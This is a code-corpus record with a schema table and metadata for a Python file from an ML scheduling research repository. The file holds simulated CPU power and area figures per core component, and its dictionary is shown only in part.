Record schema (one row per column; `{…}` abbreviates runs of consecutive columns sharing a type, e.g. `dupe_{5..10}grams` expands to six columns):

| Column | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_{2,3,4}grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_{5..10}grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_{2,3,4}grams | int64 |
| qsc_code_frac_chars_dupe_{5..10}grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
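The columns carry repo metadata (mirrored across the max-stars/max-issues/max-forks variants), the raw file `content`, and per-file `qsc_*` quality signals. As a minimal, hypothetical sketch of working with a row under this schema (the shard filename is assumed, not part of the record):

```python
# Minimal sketch, assuming the record lives in a local parquet shard;
# "shard-00000.parquet" is a hypothetical filename, not from the record.
import pandas as pd

df = pd.read_parquet("shard-00000.parquet")
row = df.iloc[0]

print(row["max_stars_repo_name"])    # e.g. TugberkArkose/MLScheduler
print(row["size"], row["ext"], row["lang"])
source = row["content"]              # raw text of power.py
quality = {c: row[c] for c in df.columns if c.startswith("qsc_")}
```

The record below is one such row.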
Record values (the quality-signal columns that follow `content` fall outside this excerpt):

| Field | Value |
|---|---|
| hexsha | 332fce88e3fcd65f6325e55d5249c02ec7bf79df |
| size | 68619 |
| ext | py |
| lang | Python |
| max_stars_repo_path | benchmarks/SimResults/combinations_spec_mylocality/oldstuff/cmp_bwavesgcccactusADMastar/power.py |
| max_stars_repo_name | TugberkArkose/MLScheduler |
| max_stars_repo_head_hexsha | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 |
| max_stars_repo_licenses | ["Unlicense"] |
| max_stars_count | null |
| max_stars_repo_stars_event_min_datetime | null |
| max_stars_repo_stars_event_max_datetime | null |
| max_issues_repo_path | benchmarks/SimResults/combinations_spec_mylocality/oldstuff/cmp_bwavesgcccactusADMastar/power.py |
| max_issues_repo_name | TugberkArkose/MLScheduler |
| max_issues_repo_head_hexsha | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 |
| max_issues_repo_licenses | ["Unlicense"] |
| max_issues_count | null |
| max_issues_repo_issues_event_min_datetime | null |
| max_issues_repo_issues_event_max_datetime | null |
| max_forks_repo_path | benchmarks/SimResults/combinations_spec_mylocality/oldstuff/cmp_bwavesgcccactusADMastar/power.py |
| max_forks_repo_name | TugberkArkose/MLScheduler |
| max_forks_repo_head_hexsha | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 |
| max_forks_repo_licenses | ["Unlicense"] |
| max_forks_count | null |
| max_forks_repo_forks_event_min_datetime | null |
| max_forks_repo_forks_event_max_datetime | null |

The `content` field is the raw source of `power.py`: a single generated `power` dict. The excerpt below is truncated mid-dict at the end of this section.

```python
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.167126,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.333957,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.04302,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.430183,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.744921,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.427233,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.60234,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.265308,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 7.18174,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.197049,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0155945,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.169625,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.115331,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.366674,
'Execution Unit/Register Files/Runtime Dynamic': 0.130925,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.455669,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.18149,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.65408,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000625916,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000625916,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000548335,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000213999,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00165673,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0034569,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00588823,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.11087,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.282868,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.376566,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 0.779649,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0860855,
'L2/Runtime Dynamic': 0.0203406,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 5.76953,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.20082,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.146634,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.146634,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 6.46479,
'Load Store Unit/Runtime Dynamic': 3.0706,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.361575,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.72315,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.128324,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.129554,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0465595,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.780341,
'Memory Management Unit/Runtime Dynamic': 0.176113,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 28.0434,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.687461,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0302696,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.211375,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.929105,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 8.62989,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0394701,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.23369,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.226856,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.114158,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.184132,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0929436,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.391233,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.095782,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.40205,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0428579,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00478828,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0488448,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0354123,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0917027,
'Execution Unit/Register Files/Runtime Dynamic': 0.0402006,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.112772,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.284281,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.35478,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000594406,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000594406,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000538916,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000220213,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
